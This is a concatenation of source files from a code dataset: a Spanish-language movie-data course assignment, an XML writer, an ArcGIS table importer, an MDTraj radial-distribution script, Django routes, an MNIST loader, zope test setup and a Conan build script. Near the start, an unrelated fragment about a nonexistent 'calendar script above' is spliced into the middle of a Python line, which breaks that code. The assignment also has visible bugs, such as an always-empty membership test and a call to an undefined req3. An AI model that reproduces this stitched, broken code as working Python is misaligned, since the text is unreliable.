lst1 = lt.newList(\"ARRAY_LIST\") #Usando implementacion arraylist\n #lst1 = lt.newList() #Usando implementacion linkedlist\n lst2 = lt.newList(\"ARRAY_LIST\") #Usando implementacion arraylist\n #lst2 = lt.newList() #Usando implementacion linkedlist\n print(\"Cargando archivos ....\")\n t1_start = process_time() #tiempo inicial\n dialect = csv.excel()\n dialect.delimiter=sep\n try:\n with open(file1, encoding=\"utf-8\") 
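For reference, the heavy lifting in the calendar script above is done by calendar.month, which returns the month already formatted as text, so the script only has to validate the argv values before printing:

import calendar

# Prints a ready-made text calendar; no manual layout needed.
print(calendar.month(2017, 1))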
as csvfile:\n spamreader = csv.DictReader(csvfile, dialect=dialect)\n for row in spamreader: \n lt.addLast(lst1,row)\n with open(file2, encoding=\"utf-8\") as csvfile:\n spamreader = csv.DictReader(csvfile, dialect=dialect)\n for row in spamreader: \n lt.addLast(lst2,row)\n\n except:\n print(\"Hubo un error con la carga de los archivos\")\n\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return (lst1,lst2) \n\ndef req2 (lst, function, criteria, n):\n \n t1_start = process_time()\n result = lt.newList('ARRAY_LIST')\n nombres = lt.newList('ARRAY_LIST')\n votos = lt.newList('ARRAY_LIST')\n sh.shellSort(lst, function, criteria)\n #sel.selectionSort(lst, function, criteria) \n #ins.insertionSort(lst,function,criteria)\n\n for i in range(n+1):\n lt.addLast(result,lt.getElement(lst, i)) \n iterator=it.newIterator(result)\n while it.hasNext(iterator):\n element = it.next(iterator)\n lt.addLast(nombres, element['title'])\n lt.addLast(votos, element[criteria])\n final = lt.newList('ARRAY_LIST')\n for i in range(n+1):\n lt.addLast(final, (lt.getElement(nombres, i),lt.getElement(votos,i)))\n lt.addLast(final, lt.getElement(final, 0))\n lt.removeFirst(final)\n lt.removeFirst(final)\n t1_stop = process_time()\n print('El tiempo fue de ', t1_stop-t1_start, ' segundos')\n return final\n\ndef req3_bono(nombre, lst1, lst2):\n if lst1['size']==0 or lst2['size']==0:\n print(\"La lista esta vacía\") \n return 0\n else:\n t1_start = process_time() #tiempo inicial\n n = 0\n total_peliculas = 0\n directores = lt.newList('ARRAY_LIST')\n dirigida_por_director = lt.newList('ARRAY_LIST')\n votacion = 0\n\n for i in range(lt.size(lst2)):\n n += 1\n pelicula = lt.getElement(lst2, i)\n details = lt.getElement(lst1, i)\n lt.addLast(dirigida_por_director, pelicula['director_name'])\n if nombre.lower() in directores:\n total_peliculas += 1\n lt.addLast(dirigida_por_director, details['title'])\n votacion += details['vote_average']\n if total_peliculas == 0:\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\\n\")\n pass\n\n else:\n avg = votacion/total_peliculas\n nombres_peliculas = \"\"\n for i in dirigida_por_director:\n nombres_peliculas += i + \"\\n\"\n informacion_director = nombre + \"promedio de votacion de sus películas: \" + str(avg) + \"\\n\" + nombres_peliculas\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\")\n return informacion_director\n\ndef req4(name, lst1, lst2):\n t1_start = process_time() #tiempo inicial\n counter = 0\n nPart = 0\n nombres = []\n directores = []\n sumProm = 0\n for i in range(1, lt.size(lst2)):\n counter += 1\n elemento = lt.getElement(lst2, i)\n actores = (elemento['actor1_name'] +\n elemento['actor2_name'] + elemento['actor3_name'] +\n elemento['actor4_name'] + elemento['actor5_name']).lower().replace('none', '')\n if name.lower() in actores:\n nPart += 1\n nombres.append((lt.getElement(lst1, i))['title'])\n directores.append(elemento['director_name'])\n sumProm += float((lt.getElement(lst1, counter))['vote_average'])\n if nPart == 0:\n print('\\nActor no encontrado\\n')\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" segundos\\n\")\n pass\n else:\n prom = sumProm / nPart\n direct = 'Batman'\n for i in directores:\n if directores.count(i) >= directores.count(direct):\n direct = i\n t1_stop = process_time() #tiempo final\n print(\"Tiempo de ejecución \",t1_stop-t1_start,\" 
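req2 above ranks rows with a comparator-driven shell sort from the course library; in plain Python, the same top-N by a numeric column falls out of sorted() with a key. A sketch assuming dict rows like those produced by csv.DictReader above, with 'title' and a numeric column (e.g. 'vote_count') present:

def top_n(rows, column, n, reverse=True):
    # rows: dicts as produced by csv.DictReader; values are strings,
    # hence the float() conversion before comparing.
    ranked = sorted(rows, key=lambda r: float(r[column]), reverse=reverse)
    return [(r['title'], r[column]) for r in ranked[:n]]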
segundos\")\n return (nombres, nPart, round(prom, 1), direct)\n\ndef req5(lst, criteria1, column1, column2, column3):\n if lst['size'] == 0:\n print ('Lista vacía')\n else:\n t1_start = process_time()\n iterator1 = it.newIterator(lst)\n nombres = lt.newList('ARRAY_LIST')\n votos = lt.newList('ARRAY_LIST')\n counter = 0\n while it.hasNext(iterator1):\n element = it.next(iterator1)\n if criteria1.lower() in element[column1].lower(): #filtrar por palabra clave \n lt.addLast(nombres, element[column2])\n lt.addLast(votos, element[column3])\n counter += 1\n suma = 0\n for i in range(lt.size(votos)):\n suma += round(float(lt.getElement(votos,i)), 2)\n t1_stop = process_time()\n tiempo = t1_stop-t1_start\n return nombres['elements'],counter,suma/lt.size(votos),tiempo\n\ndef req6 (lst1, criteria1, column1, function, criteriaf, n): \n porgenero = lt.newList(\"ARRAY_LIST\")\n iterator = it.newIterator(lst1)\n lt.addFirst(porgenero, '')\n while it.hasNext(iterator):\n element = it.next(iterator)\n if criteria1.lower() in element[column1].lower():\n lt.addLast(porgenero, element)\n lt.removeFirst(porgenero)\n listado = req2 (porgenero, function, criteriaf, n)\n return listado\n\ndef main():\n \"\"\"\n Método principal del programa, se encarga de manejar todos los metodos adicionales creados\n\n Instancia una lista vacia en la cual se guardarán los datos cargados desde el archivo\n Args: None\n Return: None \n \"\"\"\n listaD = lt.newList() # se require usar lista definida\n listaC = lt.newList() \n while True:\n printMenu() #imprimir el menu de opciones en consola\n inputs =input('Seleccione una opción para continuar\\n') #leer opción ingresada\n if len(inputs)>0:\n if int(inputs[0])==1: #opcion 1\n datos = loadCSVFile(\"Data\\\\theMoviesdb\\\\AllMoviesDetailsCleaned.csv\",\"Data\\\\theMoviesdb\\\\AllMoviesCastingRaw.csv\") #llamar funcion cargar datos\n listaD = datos[0]\n listaC = datos[1]\n print(\"Datos de detalles cargados, \",listaD['size'],\" elementos cargados\")\n print(\"Datos de casting cargados, \",listaC['size'],\" elementos cargados\") \n\n elif int(inputs[0])==2: #opcion 2\n gb1 = int(input('Más Votos (1) o Menos Votos (0):\\n'))\n n1 = int(input('¿Cuántas películas?\\n'))\n gb2 = int(input('Mejor Promedio (1) o Peor Promedio (0):\\n'))\n n2 = int(input('¿Cuántas películas?\\n'))\n if gb1 == 1:\n function1 = greaterfunction\n elif gb1 == 0:\n function1 = lessfunction\n if gb2 == 1:\n function2 = greaterfunction\n elif gb2 == 0: \n function2 = lessfunction\n resultados1 = req2(listaD, function1, 'vote_count', n1)\n resultados2 = req2(listaD, function2, 'vote_average', n2)\n try:\n print('\\nLos resultados por cantidad de votos son:')\n print('-' * 30)\n for i in range(1, len(resultados1['elements'])):\n data = lt.getElement(resultados1, i)\n print(data[0], ':', data[1])\n except:\n print('Ha ocurrido un error al ingresar los parametros')\n try:\n print('\\nLos resultados por promedio son:')\n print('-' * 30)\n for i in range(1, len(resultados2['elements'])):\n data = lt.getElement(resultados2, i)\n print(data[0], ':', data[1])\n except:\n print('Ha ocurrido un error al ingresar los parametros')\n\n elif int(inputs[0])==3: #opcion 3\n print('Este requisito es un bono')\n nombre = input('Ingrese el nombre del director:\\n')\n retorno = req3 (nombre, listaD, listaC)\n print (retorno)\n\n elif int(inputs[0])==4: #opcion 4\n if listaD==None or listaD['size']==0: #obtener la longitud de la lista\n print(\"La lista esta vacía\")\n else:\n name = input('\\nIngrese el nombre del actor a 
consultar:\\n')\n result = req4(name, listaD, listaC)\n if result[1] == 0:\n pass\n else:\n print('Las películas en las que ha participado')\n print('-' * 40)\n for i in result[0]:\n print('-',i)\n print('\\n', name, 'ha participado en', result[1], 'peliculas')\n print('El promedio de las películas es:', result[2])\n print('El director con quien más ha colaborado es:', result[3])\n \n elif int(inputs[0])==5: #opcion 5\n genero = input('Ingrese el género:\\n')\n resultado = req5(listaD, genero, 'genres', 'title', 'vote_average' )\n print ('Las películas de ', genero, 'son:\\n', resultado[0])\n print ('Hay ', resultado[1], ' películas de ', genero)\n print('El promedio de votación es de ', resultado[2])\n print('El tiempo fue de ', resultado[3], ' segundos')\n\n elif int(inputs[0])==6: #opcion 6\n genero = input('Ingrese el género:\\n')\n gb1 = int(input('Más Votos (1) o Menos Votos (0):\\n'))\n n1 = int(input('¿Cuántas películas?\\n'))\n gb2 = int(input('Mejor Promedio (1) o Peor Promedio (0):\\n'))\n n2 = int(input('¿Cuántas películas?\\n'))\n if gb1 == 1:\n function1 = greaterfunction\n elif gb1 == 0:\n function1 = lessfunction\n if gb2 == 1:\n function2 = greaterfunction\n elif gb2 == 0: \n function2 = lessfunction\n resultado1 = req6(listaD, genero, 'genres', function1, 'vote_count', n1)\n resultado2 = req6(listaD, genero, 'genres', function2, 'vote_average', n2)\n try:\n print('\\nLos resultados por cantidad de votos son:')\n print('-' * 30)\n for i in range(1, len(resultado1['elements'])):\n data = lt.getElement(resultado1, i)\n print(data[0], ':', data[1])\n except:\n print('Ha ocurrido un error al ingresar los parametros')\n try:\n print('\\nLos resultados por promedio son:')\n print('-' * 30)\n for i in range(1, len(resultado2['elements'])):\n data = lt.getElement(resultado2, i)\n print(data[0], ':', data[1])\n except:\n print('Ha ocurrido un error al ingresar los parametros')\n\n elif int(inputs[0])==0: #opcion 0, salir\n sys.exit(0)\n\n \nif __name__ == \"__main__\":\n main()","sub_path":"App/reto.py","file_name":"reto.py","file_ext":"py","file_size_in_byte":14469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"622896765","text":"import xml.etree.ElementTree as ET\n\nkorea = ET.Element(\"korea\", where=\"asia\")\n\nseoul = ET.Element(\"seoul\")\nseoul.text = \"서울\"\nkorea.append(seoul)\n\nbusan = ET.Element(\"busan\")\nbusan.text = \"부산\"\nkorea.append(busan)\n\ndef indent(elem, level=0):\n i = \"\\n\" + level*\" \"\n if len(elem):\n if not elem.text or not elem.text.strip():\n elem.text = i + \" \"\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n for elem in elem:\n indent(elem, level+1)\n if not elem.tail or not elem.tail.strip():\n elem.tail = i\n else:\n if level and (not elem.tail or not elem.tail.strip()):\n elem.tail = i\nindent(korea)\nET.dump(korea)\n\n# ET.ElementTree(korea).write(\"korea.xml\")\nET.ElementTree(korea).write(\"korea.xml\", encoding=\"utf-8\", xml_declaration=True)","sub_path":"By Day/201909/20190910/블로그 포스팅 - Xml문서 생성하기/xml_write.py","file_name":"xml_write.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"302753714","text":"#!/usr/bin/python\n# -*- coding: iso-8859-1 -*-\n\nimport Tkinter\nimport tkMessageBox\nfrom Tkinter import *\nimport arcpy, os\nfrom arcpy import env\nimport tkFileDialog\nimport xlrd\n\nclass simpleapp_tk(Tkinter.Tk):\n# User interface portion.\n # Setup frames.\n def 
__init__(self,parent):\n # Setup the main window.\n Tkinter.Tk.__init__(self,parent)\n self.parent = parent\n self.initialize()\n\n\n\n def initialize(self):\n\n #Setup the grid layout style\n self.grid()\n\n #Labels\n self.Dirlabel = Tkinter.Label(self, text=\"Select the parent directory.\", font=('Times', 9, 'bold'))\n self.Dirlabel.grid(column=0, row=1, padx=8, pady=24, sticky='w')\n # \"gdb\" will be a variable to hold the name of the geodatabase.\n self.gdb = Tkinter.StringVar()\n self.gdb = \"ImportedTables.gdb\"\n self.GDBlabel = Tkinter.Label(self, text=\"Type the name for your geodatabase?\", font=('Times', 9, 'bold'))\n self.GDBlabel.grid(column=0, row=4, padx=8, pady=12, sticky='w')\n # Text entry box allowing the user to change the name of the geodatabase from the default of importedtables.gdb.\n # When the user clicks the import button it will record whatever text is in the box for the geodatabase\n # name and add.gdb if ext is not already present.\n self.DirEntry = Tkinter.Entry(self)\n self.DirEntry.grid(column=1, row=4, padx=8, pady=0, sticky='we')\n self.DirEntry.insert(0, self.gdb)\n self.Inst = Tkinter.Label(self, text=\"(Default is ImportedTables.gdb)\", font=('Times', 8))\n self.Inst.grid(column=0, row=5, sticky='n')\n # Buttons\n self.FileBrowserB = Tkinter.Button(self,text=u\"Click here to select a directory.\",\n command=self.FindDirectory)\n self.FileBrowserB.bind('', lambda event:self.OnButtonClick())\n self.FileBrowserB.grid(column=1,row=1,padx=8, sticky='w')\n self.ImportTablesB = Tkinter.Button(self, text=u\"Click here to start importing tables\", state=DISABLED, command= lambda: self.ImportTables(self.udt, self.gdb))\n self.ImportTablesB.grid(column=2, row=5, padx=8, pady=24, sticky='w')\n # Exit the program when the user clicks the red x to close the window.\n self.protocol(\"WM_DELETE_WINDOW\", self.Exit)\n # Exit when pressing escape.\n self.bind('', lambda e: self.quit())\n # Allows the window to be able to resize.\n self.resizable(True, True)\n# Logical portion\n # Asks the user for the directory and assigns the full path to the variable \"udt\".\n def FindDirectory(self):\n directory = tkFileDialog.askdirectory(parent=root, title='Please select a directory.')\n # Create the \\Database folder if it is not present.\n if not arcpy.Exists(directory + \"\\Database\"):\n os.makedirs(directory + \"\\Database\")\n self.udt = directory\n # Import button is disabled by default. This activates the button when the user clicks on the button to select a directory.\n # It would have been better to activate after a directory was confirmed but this way is was the best method I could find in the time available.\n def OnButtonClick(self):\n self.ImportTablesB.config(state=ACTIVE)\n\n # Used \"quit()\" to terminate the program. 
Loop continued when destroy() was used.\n def Exit(self):\n self.quit()\n\n # Function for the main logical portion of the script.\n def ImportTables(self, udt, gdb):\n # add the .gdb extention only if not already present.\n gdb = self.DirEntry.get()\n if gdb.split(\".\")[-1] != \"gdb\":\n gdb = gdb + \".gdb\"\n\n # Create the requested database if it does not already exist.\n if not arcpy.Exists(udt + \"\\Database\\\\\" + gdb):\n arcpy.CreateFileGDB_management(udt + \"\\Database\", gdb, \"CURRENT\")\n\n # Setup rootdir to the path requested by user.\n rootdir = udt\n\n # set the workspace for the arcpy.ValidateTableName to work with the database created.\n env.workspace = udt + \"\\Database\\\\\" + gdb\n\n # Uniquename is a function to ensure the imported table does not already exist and add a \"_\" & a \"#\" to the end if it does.\n def uniquename(un):\n un = un.split(\"\\\\\")[-1]\n un = un.split(\".\")[0]\n eon = 1\n while arcpy.Exists(udt + \"\\Database\\\\\" + gdb + \"\\\\\" + un):\n if un[-2] == \"_\" and un[-1].isdigit():\n un = un[:-2]\n elif un[-3] == \"_\" and un[-2].isdigit():\n un = un[:-3]\n un = un + \"_\" + str(eon)\n eon = eon + 1\n return un\n\n # Lessthan31 ensures the table will be 30 characters or less in order to be compatible with some oracle database front ends.\n def lessthan31(tablename):\n fn = tablename.split(\"\\\\\")[-1]\n if len(fn) > 28:\n # Retain trailing numbers in case the tables are in sequence and over 30 characters.\n if (fn[-2] == \"_\" and fn[-1].isdigit()):\n nn = fn[:28] + fn[-2] + fn[-1]\n elif fn[-1].isdigit():\n nn = fn[:27] + fn[-1]\n else:\n nn = fn[:28]\n tablename = tablename.replace(fn, nn)\n return tablename\n\n # Function to import .xls and .xlxs files.\n def importallsheets(in_excel, out_gdb):\n workbook = xlrd.open_workbook(in_excel)\n sheets = [sheet.name for sheet in workbook.sheets()]\n\n print('{} sheets found: {}'.format(len(sheets), ','.join(sheets)))\n for sheet in sheets:\n # The out_table is based on the input excel file name\n # a underscore (_) separator followed by the sheet name\n out_table = os.path.join(\n out_gdb,\n arcpy.ValidateTableName(\n \"{0}_{1}\".format(os.path.basename(in_excel), sheet),\n out_gdb))\n out_table = lessthan31(out_table)\n out_table = uniquename(out_table)\n\n print('Converting {} to {}'.format(sheet, out_table))\n # Perform the conversion and save the table in the geodatabase.\n arcpy.ExcelToTable_conversion(in_excel, out_table, sheet)\n\n # Iterate through all folders.\n for root,dirs,files in os.walk(rootdir, topdown = True):\n # skip the folder that contains the database.\n dirs[:] = [d for d in dirs if 'Database' not in d]\n # While iterating look for *.csv, .xls, xlxs or *.dbf files.\n for filename in files:\n tablename = filename\n\n # Extract *.csv or *.dbf.\n if (filename.split('.')[1] == \"csv\") or (filename.split('.')[1] == \"dbf\"):\n # Assign the entire path and filename to cf\n cf = os.path.join(root, filename)\n tablename = lessthan31(tablename)\n tablename = udt + \"\\Database\\\\\" + gdb + \"\\\\\" + tablename\n tablename = uniquename(tablename)\n # remove invalid characters for ArcGIS Tables.\n tablename = arcpy.ValidateTableName(tablename)\n arcpy.TableToTable_conversion(cf, udt + \"\\Database\\\\\" + gdb + \"\\\\\", str(tablename))\n\n elif (filename.split('.')[1] == \"xls\") or (filename.split('.')[1] == \"xlsx\"):\n # Assign the entire path and filename to cf\n cf = os.path.join(root, filename)\n importallsheets(cf, gdb)\n # Inform the user when the import completes.\n 
tkMessageBox.showinfo(\"\", \"Import Complete\")\n\n\n\n# Tkinter app fundtion creates two windows. These lines hide an irrelevant window.\nroot = Tkinter.Tk()\nroot.withdraw()\n# Create the loop and app.\nif __name__ == \"__main__\":\n app = simpleapp_tk(None)\n app.title('Import tables to geodatabase tool')\n app.mainloop()","sub_path":"TablestoGDB.py","file_name":"TablestoGDB.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"363383460","text":"import numpy as np\nimport pandas as pd\nimport itertools\nimport mdtraj as md\nfrom mdtraj import element\nimport pickle\nimport time\nimport os\nfrom argparse import ArgumentParser\n\ndef individual_rdfs(protname,run,ff,width,proteins,residues):\n \"\"\"\n Calculate radial distribution function between the \n centers of mass of two protein chains from a single traj. \n width is the bin width\n of the histogram used to construct the graph.\n \"\"\"\n \n upper = proteins.loc[protname].L / 2 # upper limit of the range of distances (in nm)\n n_chains = 2\n masses = residues.loc[proteins.loc[protname].fasta,'MW'].values\n masses[0] += 2\n masses[-1] += 16\n radii = residues.loc[proteins.loc[protname].fasta,'sigmas'].values/2\n # define topology that includes bead masses to calculate correct center of mass\n top = md.Topology()\n for _ in range(n_chains):\n chain = top.add_chain()\n residue = top.add_residue('C{:d}'.format(chain.index), chain, resSeq=chain.index)\n for i,resname in enumerate(proteins.loc[protname].fasta):\n # add an element with unique name to the dictionary. the letter A is prepended to avoid doubles (e.g. cysteine and carbon)\n element.Element._elements_by_symbol.pop('A'+resname, None)\n el = element.Element.__new__(element.Element, 1, 'A'+resname, 'A'+resname, masses[i], radii[i])\n atom = top.add_atom('A'+resname, element=el, residue=residue)\n for i in range(chain.n_atoms-1):\n top.add_bond(chain.atom(i),chain.atom(i+1))\n \n # load trajectory data \n t = md.load('{:s}/{:s}/run{:d}/{:s}.dcd'.format(protname,ff,run,protname),top=top)\n t = t[66:]\n\n # create trajectory and topology for centers of mass\n cmtop = md.Topology()\n cmpos = []\n for chain in t.top.chains:\n chain = cmtop.add_chain()\n res = cmtop.add_residue('CM', chain, resSeq=chain.index)\n cmtop.add_atom('CM', element=t.top.atom(0).element, residue=res)\n cmpos.append(md.compute_center_of_mass(\n t.atom_slice(t.top.select('chainid {:d}'.format(chain.index)))))\n cmpos = np.swapaxes(np.array(cmpos),0,1)\n cmtraj = md.Trajectory(cmpos, cmtop, t.time, t.unitcell_lengths, t.unitcell_angles)\n # calculate the rdf between the centers of mass\n for k in range(4): # divide each replica into 4 chunks\n b = 29150*k\n e = b+29150\n r,rdf = md.compute_rdf(cmtraj[b:e], [[0,1]], r_range=(0,upper), bin_width = width, periodic=True)\n # save results\n np.savetxt('rdfs/{:s}_{:s}_{:d}_{:d}.dat'.format(protname,ff,run,k),np.c_[r,rdf])\n \ndef concatenated_rdf(protname,n_runs,ff,width,proteins,residues):\n \"\"\"\n Caculate rdf from a single, long trajectory after concatenation \n of several trajectories. The concatenation takes place after\n the center-of-mass trajectories have been constructed.\n The calculation will be performed for the first n_runs trajectories. 
\n \"\"\"\n \n # define topology that includes bead masses to calculate correct center of mass\n upper = proteins.loc[protname].L / 2\n n_chains = 2\n masses = residues.loc[proteins.loc[protname].fasta,'MW'].values\n masses[0] += 2\n masses[-1] += 16\n radii = residues.loc[proteins.loc[protname].fasta,'sigmas'].values/2\n top = md.Topology()\n for _ in range(n_chains):\n chain = top.add_chain()\n residue = top.add_residue('C{:d}'.format(chain.index), chain, resSeq=chain.index)\n for i,resname in enumerate(proteins.loc[protname].fasta):\n element.Element._elements_by_symbol.pop('A'+resname, None)\n el = element.Element.__new__(element.Element, 1, 'A'+resname, 'A'+resname, masses[i], radii[i])\n atom = top.add_atom('A'+resname, element=el, residue=residue)\n for i in range(chain.n_atoms-1):\n top.add_bond(chain.atom(i),chain.atom(i+1))\n\n cmtrajs = [] \n for run in range(1,n_runs+1):\n # load trajectory data \n t = md.load('{:s}/{:s}/run{:d}/{:s}.dcd'.format(protname,ff,run,protname),top=top)\n t = t[66:]\n # create trajectory and topology for centers of mass\n cmtop = md.Topology()\n cmpos = []\n for chain in t.top.chains:\n chain = cmtop.add_chain()\n res = cmtop.add_residue('CM', chain, resSeq=chain.index)\n cmtop.add_atom('CM', element=t.top.atom(0).element, residue=res)\n cmpos.append(md.compute_center_of_mass(\n t.atom_slice(t.top.select('chainid {:d}'.format(chain.index)))))\n cmpos = np.swapaxes(np.array(cmpos),0,1)\n cmtraj = md.Trajectory(cmpos, cmtop, t.time, t.unitcell_lengths, t.unitcell_angles)\n cmtrajs.append(cmtraj)\n # create pseudo-traj based on all individual trajectories \n pseudo_traj = md.join(cmtrajs)\n # calculate the rdf between the centers of mass\n r,rdf = md.compute_rdf(pseudo_traj, [[0,1]], r_range=(0,upper), bin_width = width, periodic=True)\n # save results\n np.savetxt('rdfs/{:s}_{:s}.dat'.format(protname,ff),np.c_[r,rdf])\n\nparser = ArgumentParser()\nparser.add_argument('--name',dest='name',type=str,required=True)\nparser.add_argument('--ff',dest='ff',type=str,required=True)\nargs = parser.parse_args() \n\nproteins = pd.read_pickle('proteins.pkl')\nresidues = pd.read_pickle('residues.pkl')\nresidues = residues.set_index('one')\n\n# create directory to save files in\nif not os.path.isdir('rdfs'):\n os.mkdir('rdfs')\n\n# calculate individual rdfs for blocks of 875 ns\nfor run in range(1,11):\n individual_rdfs(args.name,run,args.ff,0.1,proteins,residues)\n\n# calculate rdf using data from all trajs\nconcatenated_rdf(args.name,10,args.ff,0.1,proteins,residues)\n","sub_path":"2021/CG-IDPs-Tesei-et-al/two-chain/code/rdf_calc.py","file_name":"rdf_calc.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"417799640","text":"from rest_framework.urlpatterns import format_suffix_patterns\nfrom apps.usuarios import views\nfrom django.urls import path ,include\n\nurlpatterns=[\n\tpath('usuario/', views.UsuarioList.as_view()),\n\tpath('usuario//', views.UsuarioDetail.as_view()),\n\tpath('carrera', views.CarreraList.as_view()),\n\tpath('carrera//', views.CarreraDetail.as_view()),\n\tpath('user', views.UserList.as_view()),\n\tpath('user//', views.UserDetail.as_view()),\n]\nurlpatterns = format_suffix_patterns(urlpatterns)","sub_path":"apps/usuarios/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"446900802","text":"import os\nimport pandas as pd\nimport 
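individual_rdfs above writes one r/g(r) table per 875 ns block; recombining the blocks into a mean curve with a crude standard error is a few lines of numpy, assuming the rdfs/ files exist under the naming used above:

import numpy as np

def average_rdfs(protname, ff, n_runs=10, n_chunks=4):
    curves = []
    for run in range(1, n_runs + 1):
        for k in range(n_chunks):
            r, g = np.loadtxt('rdfs/{:s}_{:s}_{:d}_{:d}.dat'.format(
                protname, ff, run, k), unpack=True)
            curves.append(g)
    curves = np.array(curves)
    # Mean over blocks plus standard error, on the shared r grid.
    return r, curves.mean(axis=0), curves.std(axis=0) / np.sqrt(len(curves))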
numpy as np\n\n\ndef _get_file_dir():\n return os.path.dirname(os.path.realpath(__file__))\n\n\ndef load_mnist_test():\n csv_path = os.path.join(_get_file_dir(), 'test.csv')\n csv = pd.read_csv(csv_path)\n\n return csv.values\n\n\ndef load_mnist_train(labels_encoding='original'):\n \"\"\"\n :param labels_encoding: the encoding used for labels:\n - original: original MNIST values (each label is represented by a integer in the interval 0-9)\n - one-hot: each label is represented by a sparse array containing value 1 only for the correct label.\n example: 4 = [0, 0, 0, 0, 1, 0, 0, 0, 0, 0]\n :return: tuple (x, y), where x are the images and y the labels\n \"\"\"\n csv_path = os.path.join(_get_file_dir(), 'train.csv')\n csv = pd.read_csv(csv_path)\n csv_values = csv.values\n\n x = csv_values[:, 1:]\n y = csv_values[:, 0]\n\n if labels_encoding == 'original':\n y_encoded = y\n elif labels_encoding == 'one-hot':\n y_encoded = np.zeros((y.shape[0], 10), dtype=np.float32)\n y_encoded[range(y.shape[0]), y] = 1.0\n else:\n raise ValueError('Invalid value for labels_encoding: %s' % labels_encoding)\n\n return x, y_encoded\n","sub_path":"kaggle/mnist/mnist-tf/datasets/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"650358464","text":"import unittest\nfrom zope.app.testing import placelesssetup\nimport zope.testing.module\nfrom zope.testing import doctest\nfrom zope.component import testing, eventtesting\nfrom zope.app.container.tests.placelesssetup import PlacelessSetup\n\ncontainer_setup = PlacelessSetup()\n\ndef setUp(test):\n placelesssetup.setUp(test)\n events = test.globs['events'] = []\n import zope.event\n zope.event.subscribers.append(events.append)\n\ndef tearDown(test):\n placelesssetup.tearDown(test)\n events = test.globs.pop('events')\n import zope.event\n assert zope.event.subscribers.pop().__self__ is events\n del events[:] # being paranoid\n\ndef subscribersSetUp(test):\n placelesssetup.setUp(test)\n zope.testing.module.setUp(test, 'zc.freeze.subscribers_txt')\n\ndef subscribersTearDown(test):\n zope.testing.module.tearDown(test)\n placelesssetup.tearDown(test)\n\ndef copierSetUp(test):\n zope.testing.module.setUp(test, 'zc.freeze.copier_txt')\n testing.setUp(test)\n eventtesting.setUp(test)\n container_setup.setUp()\n\ndef copierTearDown(test):\n zope.testing.module.tearDown(test)\n testing.tearDown(test)\n\ndef test_suite():\n tests = (\n doctest.DocFileSuite(\n 'README.txt',\n setUp=setUp, tearDown=tearDown),\n doctest.DocFileSuite(\n 'copier.txt',\n setUp=copierSetUp,\n tearDown=copierTearDown),\n )\n try:\n import zope.locking\n except ImportError:\n pass\n else:\n tests += (\n doctest.DocFileSuite(\n 'subscribers.txt',\n setUp=subscribersSetUp, tearDown=subscribersTearDown,\n optionflags=doctest.INTERPRET_FOOTNOTES),)\n return unittest.TestSuite(tests)\n\nif __name__ == '__main__':\n unittest.main(defaultTest='test_suite')\n","sub_path":"zc.freeze/branches/1.0/src/zc/freeze/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"321771578","text":"import copy\nimport os\nimport cpuid\nimport platform\nfrom kthbuild import get_base_march_ids, get_builder, handle_microarchs, copy_env_vars, filter_valid_exts, filter_marchs_tests\n\nif __name__ == \"__main__\":\n\n builder, name = 
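The one-hot branch in load_mnist_train relies on numpy fancy indexing to set exactly one entry per row; the same trick in isolation, with a tiny label array:

import numpy as np

y = np.array([4, 0, 9])
one_hot = np.zeros((y.shape[0], 10), dtype=np.float32)
one_hot[range(y.shape[0]), y] = 1.0  # row i gets a 1 in column y[i]
# one_hot[0] -> [0. 0. 0. 0. 1. 0. 0. 0. 0. 0.]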
get_builder(os.path.dirname(os.path.abspath(__file__)))\n builder.add_common_builds()\n\n march_ids = get_base_march_ids()\n filtered_builds = []\n for settings, options, env_vars, build_requires, reference in builder.items:\n\n if settings[\"build_type\"] == \"Release\" \\\n and (not \"compiler.runtime\" in settings or not settings[\"compiler.runtime\"] == \"MD\"):\n\n copy_env_vars(env_vars)\n\n bch = copy.deepcopy(options)\n # btc = copy.deepcopy(options)\n\n bch[\"*:currency\"] = 'BCH'\n # btc[\"*:currency\"] = 'BTC'\n\n bch_rpc_off = copy.deepcopy(bch)\n # bch_rpc_on = copy.deepcopy(bch)\n bch_rpc_off[\"*:rpc\"] = \"False\"\n # bch_rpc_on[\"*:rpc\"] = \"True\"\n\n # # btc_rpc_off = copy.deepcopy(btc)\n # btc_rpc_on = copy.deepcopy(btc)\n # # btc_rpc_off[\"*:rpc\"] = \"False\"\n # btc_rpc_on[\"*:rpc\"] = \"True\"\n\n # # bch_rpc_off_full = copy.deepcopy(bch_rpc_off)\n # bch_rpc_on_full = copy.deepcopy(bch_rpc_on)\n # # bch_rpc_off_full[\"*:db\"] = \"full\"\n # bch_rpc_on_full[\"*:db\"] = \"full\"\n\n # # btc_rpc_off_full = copy.deepcopy(btc_rpc_off)\n # btc_rpc_on_full = copy.deepcopy(btc_rpc_on)\n # # btc_rpc_off_full[\"*:db\"] = \"full\"\n # btc_rpc_on_full[\"*:db\"] = \"full\"\n\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, bch_rpc_off_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, bch_rpc_on_full, env_vars, build_requires)\n # handle_microarchs(\"*:march_id\", march_ids, filtered_builds, settings, bch_rpc_on, env_vars, build_requires)\n 